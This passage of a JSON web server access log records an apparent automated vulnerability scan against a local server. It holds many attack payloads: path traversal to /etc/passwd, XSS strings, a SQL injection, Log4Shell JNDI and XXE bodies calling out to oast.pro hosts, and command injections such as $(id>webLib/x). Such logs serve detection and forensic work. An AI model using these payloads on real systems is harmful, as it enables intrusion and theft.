AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://ca2tuc8smpv1g2s80ca0st5ugzajzgmbq.oast.pro\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca2tuc8smpv1g2s80ca0ofgbaoxkw9zcx.oast.pro}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"$(id>webLib/x)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /SDK/webLanguage HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:03 